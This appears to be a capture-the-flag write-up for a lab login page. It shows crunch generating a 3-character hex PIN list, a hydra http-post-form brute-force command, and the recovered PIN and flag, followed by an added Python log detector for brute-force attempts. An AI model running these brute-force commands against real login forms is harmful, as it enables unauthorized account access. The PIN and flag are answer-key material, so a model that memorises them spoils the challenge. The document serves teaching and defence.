After completing this task, you will understand:
- Password complexity and the number of possible combinations
- How the number of possible combinations affects the feasibility of brute force attacks
- Generating password combinations using crunch
- Trying out passwords automatically using hydra
After the machine is up, go to http://machine_ip:8000/login.php
You will be prompted like this:
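So basically we need to brute-force the PIN.
For that we need a password list.
To generate the password list, we will use crunch. The command below writes every 3-character combination of the 16 characters 0-9 and A-F (16^3 = 4096 candidates) to 3digits.txt.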
command: crunch 3 3 0123456789ABCDEF -o 3digits.txt
Then brute-force the login form with hydra:
hydra -l '' -P 3digits.txt -f -v 10.10.139.12 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
After a while you will encounter control.php instead of error.php; at that point you have the PIN.
PIN:
6F5
flag:
THM{pin-code-brute-force}
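The hydra run above sends up to 4096 POSTs to /login.php from a single client, which is easy to spot on the server side. The following is an added example, not part of the original write-up: a sliding-window detector over web access logs. The Common Log Format layout, the threshold of 10 POSTs per 60 seconds, and the sample log lines (documentation-range IPs) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumption: Common Log Format; adapt the regex to the real server's log layout.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')

def keyspace(charset_size, length):
    """Number of candidates of exactly `length` characters (16**3 for the list above)."""
    return charset_size ** length

def flag_bruteforce(lines, path="/login.php", max_posts=10, window=timedelta(seconds=60)):
    """Map each client IP to the time it first exceeded max_posts POSTs to path in window."""
    recent = defaultdict(deque)   # per-IP timestamps still inside the sliding window
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != path:
            continue              # unparsable line, or not a login attempt
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window: # drop attempts that fell out of the window
            q.popleft()
        if len(q) > max_posts:
            flagged.setdefault(m["ip"], ts)
    return flagged

def sample_log():
    """Constructed log lines: one automated client and one user mistyping a PIN."""
    start = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    def entry(ip, ts):
        return f'{ip} - - [{ts:%d/%b/%Y:%H:%M:%S %z}] "POST /login.php HTTP/1.1" 302 0'
    lines = [entry("192.0.2.10", start + timedelta(milliseconds=250 * i)) for i in range(40)]
    lines += [entry("198.51.100.7", start + timedelta(seconds=40 * i)) for i in range(3)]
    return lines

if __name__ == "__main__":
    print("candidates in the 3-character hex list:", keyspace(16, 3))
    for ip, ts in flag_bruteforce(sample_log()).items():
        print(f"{ip} exceeded the login threshold at {ts.isoformat()}")
```

With only 4096 candidates, a per-client attempt limit or lockout enforced at the same threshold is what makes the search impractical; the detector alone only reports it.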